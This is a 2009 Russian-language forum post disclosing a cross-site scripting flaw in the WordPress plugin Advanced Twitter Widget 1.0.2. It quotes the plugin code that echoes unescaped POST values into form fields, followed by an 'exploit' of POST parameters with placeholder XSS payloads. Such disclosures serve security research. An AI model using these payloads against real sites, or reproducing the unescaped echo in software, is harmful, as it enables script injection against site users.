30.06.2009, 19:08
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln
http://wordpress.org/extend/plugins/advanced-twitter-widget/
\advanced-twitter-widget.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP код:
89: if($_POST['advanced_twitter_widget_value']!=""){
90: $xArrOptions[0]= $_POST['advanced_twitter_widget_title'];
91: $xArrOptions[1]= $_POST['advanced_twitter_widget_value'];
92: $xArrOptions[2]= $_POST['advanced_twitter_widget_type'];
93: $xArrOptions[3]= $_POST['advanced_twitter_widget_count'];
94: update_option('advanced_twitter_widget_options', serialize($xArrOptions));
95: }
97: $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
101: $xTitle = $xArrOptions[0];
102: $xValue = $xArrOptions[1];
103: $xType = $xArrOptions[2];
104: $xCount = $xArrOptions[3];
111: Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
112: Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
exploit:
Код:
POST: advanced_twitter_widget_value=">{XSS1}<a "
POST: advanced_twitter_widget_title=">{XSS2}<a "
POST: advanced_twitter_widget_type=.
POST: advanced_twitter_widget_count=.
|
|
|